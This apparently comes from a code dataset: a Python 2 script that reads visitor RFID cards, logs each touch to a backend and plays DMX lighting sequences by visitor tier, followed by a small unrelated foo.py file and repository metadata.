            # A card is present: log the touch on the backend, then pull the
            # visitor profile to pick a light show. `post` is never read.
            post = logAction(readerid, card.uid, "ACT")
            data = getVistorActions(card.uid)
            print data
            # NOTE(review): the *DMX helpers below are not defined in this
            # file as shown -- presumably supplied via `from RFIDapi import *`;
            # confirm.
            if (data['visitortype'] == 'Basic'):
                basicDMX()
            elif (data['visitortype'] == 'Premium'):
                premiumDMX()
            elif (data['visitortype'] == 'Premium VIP'):
                premiumVIPDMX()
            # Older percentile-based selection, kept commented for reference:
            # elif (data['percentile'] <= 20):
            #     # INSERT DMX CODE HERE KASPER
            #     p20DMX(data['visitortype'])
            #     break
            # elif (data['percentile'] <= 40):
            #     p40DMX(data['visitortype'])
            #     break
            # elif (data['percentile'] <= 60):
            #     p60DMX(data['visitortype'])
            #     break
            # elif (data['percentile'] <= 80):
            #     p60DMX(data['visitortype'])
            #     break
            # else:
            #     p100DMX(data['visitortype'])
            #     break
def listen_remove(card, interval, card_id):
    """Wait until the currently presented card leaves the reader.

    Polls ``card.select()`` once per ``interval`` seconds and returns None
    as soon as the reader no longer sees a card. ``card_id`` is accepted
    for future logging but currently unused.
    """
    card_present = True
    while card_present:
        screensaverstate = 1  # retained from the original code; not read anywhere
        card_present = bool(card.select())
        if card_present:
            time.sleep(interval)
    return None
##setup stuff
# Open the card reader
card = open_reader()
card_info = card.info('cardselect v0.1m')  # reader/library banner info
# Main loop
try:
    # Poll for cards until the operator interrupts with Ctrl-C.
    # NOTE(review): listen() as written never returns, so the
    # listen_remove() call below is effectively unreachable -- confirm.
    while 1:
        card_id = listen(card, 0.1)
        listen_remove(card, 0.1, card_id)
except KeyboardInterrupt:
    print "keyboard interrupt!"
| 26.604255 | 89 | 0.576456 | #!/usr/local/bin/python
# -*- coding: utf-8 -*-
#
# RFID Read
#
import os,sys
import json
import time
import rfidiot
from RFIDapi import *
import array
from ola.ClientWrapper import ClientWrapper
import config
barSignal = 0  # NOTE(review): never referenced below -- confirm before removing
dmxwrapper = ClientWrapper()  # single OLA client wrapper shared by all DMX helpers
dmxuniverse = 1  # DMX universe number the fixtures listen on
readerid = config.settings['readerID']  # this station's reader id from local config
print readerid
####################### DMX FUNCTIONS ################
def DmxSent(state):
    # Completion callback handed to OLA's SendDmx: once the frame is out,
    # stop the wrapper's event loop so SendDmx() below can return.
    # NOTE(review): `state` (the OLA send status) is ignored, so a failed
    # send goes unnoticed.
    global dmxwrapper
    dmxwrapper.Stop()
def SendDmx(dmxuniverse, dmxdata):
    # Send one DMX frame via OLA and block until DmxSent stops the loop.
    # Note: the `dmxuniverse` parameter shadows the module-level global of
    # the same name inside this function.
    global dmxwrapper
    dmxclient = dmxwrapper.Client()
    dmxclient.SendDmx(dmxuniverse, dmxdata, DmxSent)
    dmxwrapper.Run()
def confirmationDMX():
    """Show the confirmation pattern: frame [61,0,0,0,0] for one second,
    then blank all channels."""
    print("trying to confirm!")
    pulse = array.array('B', [61, 0, 0, 0, 0])
    blackout = array.array('B', [0, 0, 0, 0, 0])
    SendDmx(dmxuniverse, pulse)
    time.sleep(1)
    SendDmx(dmxuniverse, blackout)
def basicDMX():
    """Light show for 'Basic' visitors: frame [7,255,0,255,0] for one
    second, then blank all channels."""
    print("you basic scum")
    flash = array.array('B', [7, 255, 0, 255, 0])
    blackout = array.array('B', [0, 0, 0, 0, 0])
    SendDmx(dmxuniverse, flash)
    time.sleep(1)
    SendDmx(dmxuniverse, blackout)
def premiumDMX():
    """Light show for 'Premium' visitors: frame [13,0,0,50,0] for one
    second, then blank all channels."""
    print("you premium scum")
    flash = array.array('B', [13, 0, 0, 50, 0])
    blackout = array.array('B', [0, 0, 0, 0, 0])
    SendDmx(dmxuniverse, flash)
    time.sleep(1)
    SendDmx(dmxuniverse, blackout)
def premiumVIPDMX():
    """Light show for 'Premium VIP' visitors: a four-step ramp of frames,
    ending in a blackout."""
    print("you vip scum")
    sequence = [
        ([25, 0, 0, 0, 0], 1),
        ([25, 0, 0, 180, 0], 1),
        ([25, 0, 0, 255, 0], 2),
        ([255, 0, 0, 0, 0], 2),
    ]
    for channels, pause in sequence:
        SendDmx(dmxuniverse, array.array('B', channels))
        time.sleep(pause)
    SendDmx(dmxuniverse, array.array('B', [0, 0, 0, 0, 0]))
def RedDMX():
    """Blink frame [7,0,0,0,0] with shrinking pauses, briefly mix in
    [7,0,0,128,0], then blank all channels."""
    steps = [
        ([7, 0, 0, 0, 0], 1),
        ([0, 0, 0, 0, 0], 0.7),
        ([7, 0, 0, 0, 0], 0.5),
        ([0, 0, 0, 0, 0], 0.3),
        ([7, 0, 0, 0, 0], 0.1),
        ([7, 0, 0, 128, 0], 0.1),
    ]
    for channels, pause in steps:
        SendDmx(dmxuniverse, array.array('B', channels))
        time.sleep(pause)
    SendDmx(dmxuniverse, array.array('B', [0, 0, 0, 0, 0]))
def YellowDMX():
    """Send the single frame [19,0,0,0,0] (no blackout afterwards)."""
    frame = array.array('B', [19, 0, 0, 0, 0])
    SendDmx(dmxuniverse, frame)
def GreenDMX():
    """Send the single frame [13,0,0,0,0] (no blackout afterwards)."""
    frame = array.array('B', [13, 0, 0, 0, 0])
    SendDmx(dmxuniverse, frame)
def p20DMX(vtype):
    """One-second flash of frame [7,0,0,0,0], then blackout.

    `vtype` (visitor type) is accepted but not used yet.
    """
    SendDmx(dmxuniverse, array.array('B', [7, 0, 0, 0, 0]))
    time.sleep(1)
    SendDmx(dmxuniverse, array.array('B', [0, 0, 0, 0, 0]))
def p40DMX(vtype):
    """One-second flash of frame [32,0,0,0,0], then blackout.

    `vtype` (visitor type) is accepted but not used yet.
    """
    SendDmx(dmxuniverse, array.array('B', [32, 0, 0, 0, 0]))
    time.sleep(1)
    SendDmx(dmxuniverse, array.array('B', [0, 0, 0, 0, 0]))
def p60DMX(vtype):
    """One-second flash of frame [26,0,0,0,0], then blackout.

    `vtype` (visitor type) is accepted but not used yet.
    """
    SendDmx(dmxuniverse, array.array('B', [26, 0, 0, 0, 0]))
    time.sleep(1)
    SendDmx(dmxuniverse, array.array('B', [0, 0, 0, 0, 0]))
def p80DMX(vtype):
    """One-second flash of frame [14,0,0,0,0], then blackout.

    `vtype` (visitor type) is accepted but not used yet.
    """
    SendDmx(dmxuniverse, array.array('B', [14, 0, 0, 0, 0]))
    time.sleep(1)
    SendDmx(dmxuniverse, array.array('B', [0, 0, 0, 0, 0]))
def p100DMX(vtype):
    """Three-second flash of frame [200,0,0,128,0], then blackout.

    `vtype` (visitor type) is accepted but not used yet.
    """
    SendDmx(dmxuniverse, array.array('B', [200, 0, 0, 128, 0]))
    time.sleep(3)
    SendDmx(dmxuniverse, array.array('B', [0, 0, 0, 0, 0]))
# Card reader Functions
def open_reader():
    """ Attempts to open the card reader """
    # Returns the rfidiot card object on success; on any failure the bare
    # except prints a message and kills the whole process with sys.exit().
    try:
        card = rfidiot.card
        return card
    except:
        # NOTE(review): bare `except:` swallows the actual error -- log the
        # caught exception before exiting.
        print "Couldn't open reader!"
        sys.exit()
    # Unreachable: the try branch returns and the except branch exits.
    return None
def listen(card, interval):
    """ Listens for a card to be placed on the reader """
    # NOTE(review): this loop never breaks or returns, so the caller's
    # `card_id = listen(...)` only terminates via an exception (e.g.
    # KeyboardInterrupt). `interval` is accepted but unused -- the loop
    # busy-polls card.select() with no sleep between iterations.
    while 1:
        if card.select():
            #confirmationDMX()
            # print readerid
            # A card is present: log the touch remotely, then fetch the
            # visitor profile to pick a light show. `post` is never read.
            post = logAction(readerid, card.uid, "ACT")
            data = getVistorActions(card.uid)
            print data
            # Dispatch to the DMX helper for the visitor's subscription tier
            # (defined above in this file).
            if (data['visitortype'] == 'Basic'):
                basicDMX()
            elif (data['visitortype'] == 'Premium'):
                premiumDMX()
            elif (data['visitortype'] == 'Premium VIP'):
                premiumVIPDMX()
            # Earlier percentile-based selection, kept commented for reference:
            # elif (data['percentile'] <= 20):
            #     # INSERT DMX CODE HERE KASPER
            #     p20DMX(data['visitortype'])
            #     break
            # elif (data['percentile'] <= 40):
            #     p40DMX(data['visitortype'])
            #     break
            # elif (data['percentile'] <= 60):
            #     p60DMX(data['visitortype'])
            #     break
            # elif (data['percentile'] <= 80):
            #     p60DMX(data['visitortype'])
            #     break
            # else:
            #     p100DMX(data['visitortype'])
            #     break
def listen_remove(card, interval, card_id):
    """Block until no card is seen on the reader any more.

    ``card.select()`` is polled once per ``interval`` seconds; returns None
    as soon as the reader stops seeing a card. ``card_id`` is currently
    unused.
    """
    while True:
        screensaverstate = 1  # kept from the original code; not read anywhere
        if not card.select():
            break
        time.sleep(interval)
    return None
##setup stuff
# Open the card reader
card = open_reader()
card_info = card.info('cardselect v0.1m')  # reader/library banner info
# Main loop
try:
    # Poll for cards until the operator hits Ctrl-C.
    # NOTE(review): listen() as written never returns, so the
    # listen_remove() call below is effectively dead code -- confirm.
    while 1:
        card_id = listen(card, 0.1)
        listen_remove(card, 0.1, card_id)
except KeyboardInterrupt:
    print "keyboard interrupt!"
| 3,361 | 0 | 332 |
3f5a2a352aa3a95c4de95b90f2096d9a28696c87 | 85 | py | Python | foo.py | thanhkaist/colab_test | 86d3c03b85ceed26c5ebab6db2aa8d88b2f531be | [
"MIT"
] | 1 | 2020-04-04T14:19:45.000Z | 2020-04-04T14:19:45.000Z | foo.py | thanhkaist/colab_test | 86d3c03b85ceed26c5ebab6db2aa8d88b2f531be | [
"MIT"
] | 1 | 2020-04-14T06:33:35.000Z | 2020-04-14T06:38:36.000Z | foo.py | thanhkaist/colab_test | 86d3c03b85ceed26c5ebab6db2aa8d88b2f531be | [
"MIT"
] | null | null | null | import os
| 7.727273 | 19 | 0.517647 | import os
def foo():
    """Print foo's identifying message."""
    message = "foo func"
    print(message)
def bar():
    """Print bar's identifying message."""
    message = "bar func"
    print(message)
| 18 | 0 | 48 |